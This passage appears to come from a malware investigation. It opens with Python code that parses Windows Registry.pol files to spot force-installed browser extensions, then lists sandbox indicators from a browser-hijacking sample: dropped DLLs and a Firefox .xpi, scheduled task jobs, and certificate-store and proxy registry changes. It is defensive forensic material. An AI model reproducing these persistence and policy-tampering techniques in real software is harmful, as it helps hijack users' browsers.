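def _read_wstr(buf, pos):
    """Read a NUL-terminated UTF-16LE string starting at pos."""
    end = pos
    while True:
        if end + 2 > len(buf):
            raise ValueError("unterminated string in Registry.pol")
        if buf[end:end + 2] == b"\0\0":
            return buf[pos:end].decode("utf-16-le"), end + 2
        end += 2


def _expect(buf, pos, token):
    if buf[pos:pos + 2] != _w(token):
        raise ValueError(f"expected {token!r} at offset {pos}")
    return pos + 2


def parse_registry_pol(buf):
    """Parse a Registry.pol blob into (key, value_name, type, data) tuples.

    Value names starting with ** (e.g. **DeleteValues, **del.<name>) are
    policy deletion markers; they are returned unchanged for the caller to judge."""
    if buf[:4] != PREG_MAGIC:
        raise ValueError("not a Registry.pol file (missing PReg magic)")
    (version,) = struct.unpack_from("<I", buf, 4)
    if version != PREG_VERSION:
        raise ValueError(f"unsupported Registry.pol version {version}")
    pos, entries = 8, []
    while pos < len(buf):
        pos = _expect(buf, pos, "[")
        key, pos = _read_wstr(buf, pos)
        pos = _expect(buf, pos, ";")
        name, pos = _read_wstr(buf, pos)
        pos = _expect(buf, pos, ";")
        (vtype,) = struct.unpack_from("<I", buf, pos)
        pos = _expect(buf, pos + 4, ";")
        (size,) = struct.unpack_from("<I", buf, pos)
        pos = _expect(buf, pos + 4, ";")
        raw = bytes(buf[pos:pos + size])
        pos = _expect(buf, pos + size, "]")
        if vtype == REG_DWORD:
            data = struct.unpack("<I", raw)[0]
        elif vtype == REG_SZ:
            data = raw.decode("utf-16-le").rstrip("\0")
        else:
            data = raw
        entries.append((key, name, vtype, data))
    return entries


def browser_policy_entries(entries):
    """Entries under the Chrome, Edge or Firefox policy keys."""
    return [e for e in entries if e[0].lower().startswith(BROWSER_POLICY_PREFIXES)]


def forced_chrome_extensions(entries):
    """Extension IDs from ExtensionInstallForcelist values (data is 'id;update_url')."""
    return [data.split(";", 1)[0] for key, _name, vtype, data in entries
            if vtype == REG_SZ and key.lower().endswith("\\extensioninstallforcelist")]


# Constructed sample: the extension ID is the one under Chrome's Extensions
# directory in this report; the update URL, the DeveloperToolsAvailability
# value and the third entry are placeholders, not data from the report.
SAMPLE_ENTRIES = [
    (r"Software\Policies\Google\Chrome\ExtensionInstallForcelist", "1", REG_SZ,
     "gfcdbodapcbfckbfpmgeldfkkgjknceo;https://updates.example.invalid/update.xml"),
    (r"Software\Policies\Google\Chrome", "DeveloperToolsAvailability", REG_DWORD, 2),
    (r"Software\Policies\Example\Unrelated", "Setting", REG_SZ, "value"),
]

if __name__ == "__main__":
    parsed = parse_registry_pol(build_registry_pol(SAMPLE_ENTRIES))
    for entry in browser_policy_entries(parsed):
        print(entry)
    print("force-installed:", forced_chrome_extensions(parsed))
```

On a suspect host, read the real file with open(path, "rb") and pass the bytes to parse_registry_pol; compare the result against HKLM\Software\Policies as well, since a policy refresh will have copied the entries there. Note that the user-level file (GroupPolicy\User\Registry.pol) uses the same format and is worth checking too.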

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files (x86)\oWxSecJNU\aYvhmsh.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files (x86)\YNUWFfCEdUiU2\ICzrjSr.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\phinBxB.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files (x86)\YNUWFfCEdUiU2\MWmNKgVxMMUzC.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\bVkZNoO.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files (x86)\LsajhStaXkJRC\TVYoBqc.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files (x86)\LsajhStaXkJRC\sCwzdYP.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files (x86)\oWxSecJNU\WNgxMz.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files (x86)\QpigBxJgKxUn\iUmKyhU.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bJbhxhmwQPPePEjnjA.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\FTlmQXMDCFpnewAuq.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\zeLHdclAQOoTZxj.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\dBpreMcpfXbehynYz.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\forfiles.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1541411d-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1541411d-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
